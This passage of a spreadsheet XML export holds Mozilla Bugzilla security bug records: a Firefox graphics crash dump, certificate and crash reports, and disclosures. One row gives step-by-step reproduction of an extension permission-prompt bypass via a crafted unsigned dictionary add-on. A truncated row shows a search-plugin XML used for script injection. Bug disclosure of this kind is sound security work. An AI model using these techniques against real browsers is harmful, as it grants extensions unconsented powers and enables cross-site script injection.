@rbx              struct gl::VertexAttribute * attrib = 0x000001a7`01436400
&lt;unavailable&gt;     class gl::VertexBinding * binding = &lt;value unavailable&gt;
00000043`3dbfd040 unsigned int currentValueType = 0x1406
00000043`3dbfd048 int start = 0n-654114815
00000043`3dbfd050 unsigned int64 count = 1
00000043`3dbfd058 int instances = 0n0
00000043`3dbfd060 unsigned int offset = 0
00000043`3dbfd068 unsigned char * sourceData = 0x000001a7`014a8500 ""
@r12              unsigned char * input = 0x000001a6`b3508502 "--- memory read error at address 0x000001a6`b3508502 ---"
@rsi              unsigned char * output = 0x000001a7`77880000 ""
&lt;unavailable&gt;     int inputStride = &lt;value unavailable&gt;
&lt;unavailable&gt;     gl::VertexFormatType vertexFormatType = &lt;value unavailable&gt;
&lt;unavailable&gt;     D3D_FEATURE_LEVEL featureLevel = &lt;value unavailable&gt;
&lt;unavailable&gt;     struct rx::d3d11::VertexFormat * vertexFormatInfo = &lt;value unavailable&gt;
&lt;unavailable&gt;     class gl::Error ANGLE_LOCAL_VAR = &lt;value unavailable&gt;
6:251&gt; dx -id 0,6 -r1 ((libGLESv2!unsigned char *)0x1a6b3508502)
((libGLESv2!unsigned char *)0x1a6b3508502)                 : 0x1a6b3508502 : Unable to read memory at Address 0x1a6b3508502 [Type: unsigned char *]
    Unable to read memory at Address 0x1a6b3508502
https://dxr.mozilla.org/mozilla-central/source/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/VertexBuffer11.cpp#128
angle::Result VertexBuffer11::storeVertexAttributes(const gl::Context *context,
                                                    const gl::VertexAttribute &amp;attrib,
                                                    const gl::VertexBinding &amp;binding,
                                                    GLenum currentValueType,
                                                    GLint start,
                                                    size_t count,
                                                    GLsizei instances,
                                                    unsigned int offset,
                                                    const uint8_t *sourceData)
{
    ASSERT(mBuffer.valid());
    int inputStride = static_cast&lt;int&gt;(ComputeVertexAttributeStride(attrib, binding));
    // This will map the resource if it isn't already mapped.
    ANGLE_TRY(mapResource(context));
    uint8_t *output = mMappedResourceData + offset;
    const uint8_t *input = sourceData;
    if (instances == 0 || binding.getDivisor() == 0)
    {
        input += inputStride * start;
    }
    gl::VertexFormatType vertexFormatType = gl::GetVertexFormatType(attrib, currentValueType);
    const D3D_FEATURE_LEVEL featureLevel  = mRenderer-&gt;getRenderer11DeviceCaps().featureLevel;
    const d3d11::VertexFormat &amp;vertexFormatInfo =
        d3d11::GetVertexFormatInfo(vertexFormatType, featureLevel);
    ASSERT(vertexFormatInfo.copyFunction != nullptr);
    vertexFormatInfo.copyFunction(input, inputStride, count, output);
    return angle::Result::Continue();
}
6:251&gt; lmv m firefox
Browse full module list
start             end                 module name
00007ff6`b6be0000 00007ff6`b6c62000   firefox    (deferred)             
    Image path: firefox.exe
    Image name: firefox.exe
    Browse all global symbols  functions  data
    Timestamp:        Thu Oct 18 12:36:32 2018 (5BC8E0C0)
    CheckSum:         000857C7
    ImageSize:        00082000
    File version:     63.0.0.6865
    Product version:  63.0.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    Information from resource tables:
        CompanyName:      Mozilla Corporation
        ProductName:      Firefox
        InternalName:     Firefox
        OriginalFilename: firefox.exe
        ProductVersion:   63.0
        FileVersion:      63.0
        FileDescription:  Firefox
        LegalCopyright:   ©Firefox and Mozilla Developers; available under the MPL 2 license.
        LegalTrademarks:  Firefox is a Trademark of The Mozilla Foundation.
Attached is the POC that was sent as well.</t>
        </is>
      </c>
      <c r="X6280" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6281">
      <c r="A6281" t="n">
        <v>1308251</v>
      </c>
      <c r="B6281" t="inlineStr">
        <is>
          <t>2016-10-06 09:24:34 -0700</t>
        </is>
      </c>
      <c r="C6281" t="inlineStr">
        <is>
          <t>Remove built-in certificate requirement for addon updates (no security updates for corporate or AntiVirus users)</t>
        </is>
      </c>
      <c r="D6281" t="inlineStr">
        <is>
          <t>2024-08-08 06:56:57 -0700</t>
        </is>
      </c>
      <c r="E6281" t="n">
        <v>1</v>
      </c>
      <c r="F6281" t="n">
        <v>1</v>
      </c>
      <c r="G6281" t="n">
        <v>3</v>
      </c>
      <c r="H6281" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6281" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6281" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K6281" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6281" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6281" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6281" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6281" t="inlineStr">
        <is>
          <t>[STR in comment 67][adv-main78+][adv-esr68.10+]</t>
        </is>
      </c>
      <c r="Q6281" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6281" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6281" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T6281" t="n">
        <v>1</v>
      </c>
      <c r="U6281" t="n">
        <v>1</v>
      </c>
      <c r="V6281" t="n">
        <v>88</v>
      </c>
      <c r="W6281" t="inlineStr">
        <is>
          <t>Created attachment 8798485
WhimsyPro update failing
We've had reports of add-on installation on Test Pilot being broken by users of security software suites. After some investigation, I found that these suites (Avast Free and Kaspersky were the ones observed, but there are likely others) installed their own root certificate in Firefox's store (in order to monitor encrypted traffic), and MITMed all outgoing connections.
Some testing showed that the add-on install failures was due to built-in certificate check failing.
Of note:
- This does not break installs on AMO, though both AMO and its CDN are MITMed.
- This does not break installs from the Discopane.
- This does break add-on updates.
- This does break system add-on updates.
- This breaks installs of the Test Pilot add-on, which uses mozAddonManager.
- This breaks installs of Test Pilot experiments, which uses AddonManager.
Probably not a security bug, but since there may be potentially-exploitable holes, I figured I'd let someone with better expertise in that area make that call.
[1] https://github.com/mozilla/testpilot/issues/1474
[2] https://github.com/mozilla/testpilot/issues/1474#issuecomment-251997267</t>
        </is>
      </c>
      <c r="X6281" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6282">
      <c r="A6282" t="n">
        <v>1750565</v>
      </c>
      <c r="B6282" t="inlineStr">
        <is>
          <t>2022-01-17 06:41:47 -0800</t>
        </is>
      </c>
      <c r="C6282" t="inlineStr">
        <is>
          <t>Extension permission prompts skipped via dictionary</t>
        </is>
      </c>
      <c r="D6282" t="inlineStr">
        <is>
          <t>2024-06-28 07:59:41 -0700</t>
        </is>
      </c>
      <c r="E6282" t="n">
        <v>1</v>
      </c>
      <c r="F6282" t="n">
        <v>1</v>
      </c>
      <c r="G6282" t="n">
        <v>3</v>
      </c>
      <c r="H6282" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6282" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6282" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K6282" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6282" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6282" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6282" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6282" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6282" t="inlineStr">
        <is>
          <t>[sec-survey][post-critsmash-triage][adv-main97+][adv-esr91.6+]</t>
        </is>
      </c>
      <c r="Q6282" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6282" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S6282" t="inlineStr">
        <is>
          <t>98 Branch</t>
        </is>
      </c>
      <c r="T6282" t="n">
        <v>1</v>
      </c>
      <c r="U6282" t="n">
        <v>0</v>
      </c>
      <c r="V6282" t="n">
        <v>19</v>
      </c>
      <c r="W6282" t="inlineStr">
        <is>
          <t>Extensions should only be able to use powerful extension APIs after users have consented via a permission prompt that lists the requested permissions.
I found that these checks can be bypassed, by getting the user to install an innocent-looking (unsigned) dictionary, and then exploiting the update mechanism to convert it to a (powerful) extension.
This works because of the following implementation details:
- Auto-updates for add-ons are enabled by default
   - auto-update starts in  [AddonManager.jsm's `backgroundUpdateCheck`](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/mozapps/extensions/AddonManager.jsm#1330-1358)
   - manual update with a similar bug starts at [aboutaddons.js's `checkForUpdate`](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/mozapps/extensions/content/aboutaddons.js#320-359)
- A code path to skip permission prompts for upgrades from legacy extensions to WebExtensions, introduced in bug 1339552:
  - Background updates skips prompts in [AddonManager.jsm's `_updatePromptHandler`](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/mozapps/extensions/AddonManager.jsm#1265-1269)
  - Manually triggered updates skips prompts in [aboutaddonsCommon.js's `installPromptHandler`](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/mozapps/extensions/content/aboutaddonsCommon.js#68-72)
- The logic that computes permissions for WebExtensions returns `null` for non-extension WebExtensions, in [Extension.jsm's `manifestPermissions` getter](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/components/extensions/Extension.jsm#748-751)
- At add-on installation/updates, add-ons may freely change addon type
  - Firefox does not check `addon.type` when an update is loaded, by [XPIInstall.jsm's `loadManifest` method of `AddonInstall`](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/mozapps/extensions/internal/XPIInstall.jsm#1535).
  - While AMO [prevents add-ons from changing types](https://github.com/mozilla/addons-server/blob/aaf7ef1354afa590a04b8b6c37e90f391cbff384/src/olympia/files/utils.py#L967-L971), this AMO check can be bypassed if it is possible to get the user to install an add-on that has not been submitted to AMO. That means that the add-on is not signed.
  - Signatures are required (on release) for all add-on types, except the ["dictionary" add-on type](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/components/extensions/Extension.jsm#483) (because it is not listed in [SIGNED_TYPES](https://searchfox.org/mozilla-central/rev/72c7cef167829b6f1e24cae216fa261934c455fc/toolkit/mozapps/extensions/internal/XPIDatabase.jsm#162-167)).
To reproduce this:
1. Create a `manifest.json` file with the following content. Note that I have picked an arbitrary ID from an add-on hosted on AMO (and Firefox uses AMO to check for updates by default), but I could also have added an `update_url` that points to a self-hosted update endpoint.
```
{
    "name": "Dictate crx",
    "version": "0.0.0.1",
    "manifest_version": 2,
    "dictionaries": {},
    "applications": {
        "gecko": {
            "id": "crxviewer-firefox@robwu.nl"
        }
    }
}
```
2. Create a zip file with the name `unsigned.xpi` containing the above `manifest.json` file. Note that this is an unsigned add-on.
3. Open the xpi in Firefox. Firefox shows an installation prompt, but no special warnings.
   - Note that Firefox will show an icon from the add-on from AMO, because Firefox fetches additional metadata from AMO by default.
4. Visit `about:addons`, click on the Gear icon and click on the "Check for updates" menu item.
5. Click on the "Dictionaries" list at `about:addons` and look for the above add-on, and similarly look at the "Extensions" list in `about:addons`.
Expected:
- At step 5, the "Dictionaries" list should still show the "Dictate crx" add-on (dictionary).
- Or, after step 4, the update should at least be blocked on a permission prompt.
Actual:
- At step 5, the "Dictionaries" list is empty, and the "Extensions" list shows the extension from AMO.</t>
        </is>
      </c>
      <c r="X6282" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6283">
      <c r="A6283" t="n">
        <v>1275339</v>
      </c>
      <c r="B6283" t="inlineStr">
        <is>
          <t>2016-05-24 17:50:04 -0700</t>
        </is>
      </c>
      <c r="C6283" t="inlineStr">
        <is>
          <t>Crash in _cairo_surface_get_extents with FFMPEG 0.10</t>
        </is>
      </c>
      <c r="D6283" t="inlineStr">
        <is>
          <t>2016-09-22 17:25:02 -0700</t>
        </is>
      </c>
      <c r="E6283" t="n">
        <v>1</v>
      </c>
      <c r="F6283" t="n">
        <v>1</v>
      </c>
      <c r="G6283" t="n">
        <v>3</v>
      </c>
      <c r="H6283" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6283" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6283" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K6283" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L6283" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6283" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6283" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6283" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6283" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q6283" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6283" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6283" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T6283" t="n">
        <v>1</v>
      </c>
      <c r="U6283" t="n">
        <v>0</v>
      </c>
      <c r="V6283" t="n">
        <v>60</v>
      </c>
      <c r="W6283" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-ca9ae074-6b5c-42f9-81eb-0080f2160524.
=============================================================
Firefox 46 consistently crashes with SIGSEGV when playing HTML5 video, or sometimes when merely loading HTML5 video elements.</t>
        </is>
      </c>
      <c r="X6283" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6284">
      <c r="A6284" t="n">
        <v>80105</v>
      </c>
      <c r="B6284" t="inlineStr">
        <is>
          <t>2001-05-10 14:38:01 -0700</t>
        </is>
      </c>
      <c r="C6284" t="inlineStr">
        <is>
          <t>navigator.plugins.refresh(1) crashes on pages with xpcom plugin - M091 topcrash [@ nsPluginInstanceOwner::GetInstance]</t>
        </is>
      </c>
      <c r="D6284" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E6284" t="n">
        <v>1</v>
      </c>
      <c r="F6284" t="n">
        <v>1</v>
      </c>
      <c r="G6284" t="n">
        <v>6</v>
      </c>
      <c r="H6284" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6284" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6284" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K6284" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6284" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6284" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6284" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6284" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6284" t="inlineStr">
        <is>
          <t>rtm stopper, eta: 06-17-2001, critical for 0.9.2</t>
        </is>
      </c>
      <c r="Q6284" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6284" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6284" t="inlineStr">
        <is>
          <t>mozilla0.9.2</t>
        </is>
      </c>
      <c r="T6284" t="n">
        <v>1</v>
      </c>
      <c r="U6284" t="n">
        <v>0</v>
      </c>
      <c r="V6284" t="n">
        <v>78</v>
      </c>
      <c r="W6284" t="inlineStr">
        <is>
          <t>This one is showing up in the Linux M09 build (2001050822). Looking at the 
comments it may be related to bug 76936 
(nsPluginInstanceOwner::~nsPluginInstanceOwner)
(30155720) Comments: quitting netscape after a longish sessionnote that
this page has a java applet
(30196733) Comments: I closed netscape done through "file/quit"
(30185093) Comments: I quit Navigator
(30170956) Comments: I just wanted to exit the browser.
(30157054) Comments: I just quit the browser with Ctrl-Q...
(30144960) Comments: closing mozilla
(30142454) Comments: Picked the "Close"-menuitem from the adressbook
windows "file" menu.
nsPluginInstanceOwner::GetInstance()
         nsObjectFrame::Destroy()
         nsLineBox::DeleteLineList()
         nsBlockFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsTableFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsTableOuterFrame::Destroy()
         nsLineBox::DeleteLineList()
         nsBlockFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsTableFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsTableOuterFrame::Destroy()
         nsLineBox::DeleteLineList()
         nsBlockFrame::Destroy()
         nsLineBox::DeleteLineList()
         nsBlockFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsBoxFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         nsBoxFrame::Destroy()
         nsGfxScrollFrame::Destroy()
         nsFrameList::DestroyFrames()
         nsContainerFrame::Destroy()
         ViewportFrame::Destroy()
         FrameManager::Destroy()
         PresShell::~PresShell()
         PresShell::Release()
         nsCOMPtr_base::~nsCOMPtr_base()
         DocumentViewerImpl::~DocumentViewerImpl()
         DocumentViewerImpl::Release()
         nsCOMPtr_base::assign_with_AddRef()
         nsDocShell::Destroy()
         nsWebShell::Destroy()
         nsDocShell::DestroyChildren()
         nsDocShell::Destroy()
         nsWebShell::Destroy()
         nsXULWindow::Destroy()
         nsWebShellWindow::Destroy()
         nsChromeTreeOwner::Destroy()
         GlobalWindowImpl::Close()
         nsAppShellService::Quit()
         XPTC_InvokeByIndex()
         nsXPCWrappedNativeClass::CallWrappedMethod()
         WrappedNative_CallMethod()
         js_Invoke()
         js_Interpret()
         js_Invoke()
         js_InternalInvoke()
         JS_CallFunctionValue()
         nsJSContext::CallEventHandler()
         nsJSEventListener::HandleEvent()
         nsEventListenerManager::HandleEventSubType()
         nsEventListenerManager::HandleEvent()
         nsXULElement::HandleDOMEvent()
         PresShell::HandleDOMEventWithTarget()
         nsMenuFrame::Execute()
         nsMenuFrame::HandleEvent()
         PresShell::HandleEventInternal()
         PresShell::HandleEvent()
         nsView::HandleEvent()
         nsView::HandleEvent()
         nsView::HandleEvent()
         nsView::HandleEvent()
         nsViewManager::DispatchEvent()
         HandleEvent()
         nsWidget::DispatchEvent()
         nsWidget::DispatchWindowEvent()
         nsWidget::DispatchMouseEvent()
         nsWidget::OnButtonReleaseSignal()
         nsWindow::HandleGDKEvent()
         dispatch_superwin_event()
         handle_gdk_event()
         libgdk-1.2.so.0 + 0x17507 (0x406cc507)
         libglib-1.2.so.0 + 0x10309 (0x406fc309)
         libglib-1.2.so.0 + 0x10913 (0x406fc913)
         libglib-1.2.so.0 + 0x10aac (0x406fcaac)
         libgtk-1.2.so.0 + 0x93c57 (0x40610c57)
         nsAppShell::Run()</t>
        </is>
      </c>
      <c r="X6284" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6285">
      <c r="A6285" t="n">
        <v>769265</v>
      </c>
      <c r="B6285" t="inlineStr">
        <is>
          <t>2012-06-28 07:13:52 -0700</t>
        </is>
      </c>
      <c r="C6285" t="inlineStr">
        <is>
          <t>Audit for incorrect uses of __android_log_print</t>
        </is>
      </c>
      <c r="D6285" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6285" t="n">
        <v>1</v>
      </c>
      <c r="F6285" t="n">
        <v>1</v>
      </c>
      <c r="G6285" t="n">
        <v>3</v>
      </c>
      <c r="H6285" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6285" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6285" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6285" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6285" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6285" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6285" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6285" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6285" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q6285" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6285" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6285" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T6285" t="n">
        <v>1</v>
      </c>
      <c r="U6285" t="n">
        <v>0</v>
      </c>
      <c r="V6285" t="n">
        <v>14</v>
      </c>
      <c r="W6285" t="inlineStr">
        <is>
          <t>Debugging something today, I realized that we have a few places where we incorrectly call __android_log_print in potentially exploitable ways. The fix is easy and coming up.</t>
        </is>
      </c>
      <c r="X6285" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6286">
      <c r="A6286" t="n">
        <v>411357</v>
      </c>
      <c r="B6286" t="inlineStr">
        <is>
          <t>2008-01-08 15:06:04 -0800</t>
        </is>
      </c>
      <c r="C6286" t="inlineStr">
        <is>
          <t>Store Bugzilla or Issue-tracking IDs in database</t>
        </is>
      </c>
      <c r="D6286" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E6286" t="n">
        <v>1</v>
      </c>
      <c r="F6286" t="n">
        <v>1</v>
      </c>
      <c r="G6286" t="n">
        <v>4</v>
      </c>
      <c r="H6286" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6286" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6286" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6286" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6286" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6286" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6286" t="inlineStr"/>
      <c r="Q6286" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6286" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6286" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6286" t="n">
        <v>1</v>
      </c>
      <c r="U6286" t="n">
        <v>0</v>
      </c>
      <c r="V6286" t="n">
        <v>12</v>
      </c>
      <c r="W6286" t="inlineStr">
        <is>
          <t>Reported by morgamic, Jul 10, 2007
Right now there is no way to store bug information related to a crash
signature or group of crash signatures in the database.  There needs to be
a way to store this info so we can integrate our reporting system with
other applications.  
Another feature we could have in the future could be a notification system
to tell users when their issue has been resolved (or filed) so they can
optionally track it.
--
Comment 1 by bsmedberg, Jul 10, 2007
See
http://groups.google.com/group/mozilla.dev.quality/browse_frm/thread/109c6342ebcd9732/2327b70f05f4c299?lnk=gst&amp;q=mapping+crash+reports&amp;rnum=1#2327b70f05f4c299
for the newsgroup discussion.
My current thought is a simple mapping table:
bugsignatures
  signature     '@NS_InitXPCOM3'
  bugid         123456
  bugstatus     'FIXED'
This table would be pulled from bugzilla data on a cronjob. Right now I don't think it's necessary to automatically file bugs on crashes, although we might want to provide an easy way to manually file the bug (e.g. a link to enter_bug.cgi with relevant data pre-filled).
--
Comment 2 by bsmedberg, Jul 10, 2007
oh and the primary key would be signature/bugid... you can have multiple bugs for a single signature, and a single bug can be for multiple signatures (e.g.
platform-specific signatures that have a common cause)
--
Comment 3 by morgamic, Jul 10, 2007
(No comment was entered for this change.)
Labels: -Priority-High Priority-Critical
--
Comment 4 by morgamic, Jul 10, 2007
(No comment was entered for this change.)
Labels: -Priority-Critical Priority-Medium
--
Comment 5 by morgamic, Jul 10, 2007
(No comment was entered for this change.)
Labels: Hackathon
--
Comment 6 by morgamic, Jul 12, 2007
Simple table structure attached.
Some constraints we talked about:
* Only grab 2-3 bugs per status
* There are 5 statuses so that turns into 10-15 bugs retrieved total
* Only retrieve the top 100 signatures by product
Working on standalone script for using xml from bz to get ids.
--
Comment 7 by bsmedberg, Jul 12, 2007
Are those technical constraints? Displaying only one/a few bugs for crashes is one of the very common complaints about the current reports.
Could we just run a cronjob on bugzilla that queries all bugs and searches for a
whiteboard pattern, e.g. [@.*] and spews it out matches in XML?
--
Comment 8 by morgamic, Jul 12, 2007
Sure, those were ideas Jay had for limiting which bugs to pull out (since all might be excessive and generate a lot of load).  If you'd rather handle it via whiteboard or another field, that'd work too.
--
Comment 9 by bsmedberg, Jul 13, 2007
I was hoping a full tablescan on bugzilla twice a day wouldn't be too much load, but I don't really know anything about it. My preference, if it's technically feasible, is to have more data.
Talkback uses the whiteboard or the summary currently?</t>
        </is>
      </c>
      <c r="X6286" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6287">
      <c r="A6287" t="n">
        <v>483086</v>
      </c>
      <c r="B6287" t="inlineStr">
        <is>
          <t>2009-03-12 16:33:38 -0700</t>
        </is>
      </c>
      <c r="C6287" t="inlineStr">
        <is>
          <t>non-http[s] SearchForm URIs should be ignored (possible XSS if a malicious search plugin is installed)</t>
        </is>
      </c>
      <c r="D6287" t="inlineStr">
        <is>
          <t>2013-09-26 11:00:04 -0700</t>
        </is>
      </c>
      <c r="E6287" t="n">
        <v>1</v>
      </c>
      <c r="F6287" t="n">
        <v>1</v>
      </c>
      <c r="G6287" t="n">
        <v>2</v>
      </c>
      <c r="H6287" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6287" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6287" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K6287" t="inlineStr">
        <is>
          <t>3.5 Branch</t>
        </is>
      </c>
      <c r="L6287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6287" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6287" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6287" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6287" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q6287" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6287" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6287" t="inlineStr">
        <is>
          <t>Firefox 3.6a1</t>
        </is>
      </c>
      <c r="T6287" t="n">
        <v>1</v>
      </c>
      <c r="U6287" t="n">
        <v>0</v>
      </c>
      <c r="V6287" t="n">
        <v>25</v>
      </c>
      <c r="W6287" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7
Build Identifier: 3.0.7
If the attacker the trick the user into his search plugin, then the attacker can inject JS into any web site using the XML below.  
&lt;SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/"&gt;
&lt;ShortName&gt;FOO.com&lt;/ShortName&gt;
&lt;Description&gt;Foo.com Search Engine - Better Web Search&lt;/Description&gt;
&lt;InputEncoding&gt;UTF-8&lt;/InputEncoding&gt;
&lt;Image width="16" height="16"&gt;data:image/x-icon;base64,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DBgAAAAAASBX///////8GEzQ/Ll5VEUo9aXX///86e08hAg1qUUUiaymAOXf/NxQlglZvIzgzHksFeQxs/xcBEG1aWC1lc2YgCmEEUkE2BwFdaHAkQ3RGRxgqAmcWKwgFD1Q7Yn4xYzx2En0DGf9TBwFbLyZgCVwdQgtuBE7//3xEQD4nA1BZgTVXHwIw/////3pkHEkOTV8aTIR//////////yxyeBsycSj/////////////////////////////////////////////////AAD//wAA//8AAMAfAACABwAAAAEAAAABAAAAAAAAAAAAAAAAAACAAAAAwAAAAPABAAD8BwAA//8AAP//AAA=&lt;/Image&gt;
&lt;Url type="text/html" method="GET" template="http://www.ask.com/web"&gt;
  &lt;Param name="q" value="{searchTerms}"/&gt;
  &lt;Param name="o" value="1576"/&gt;
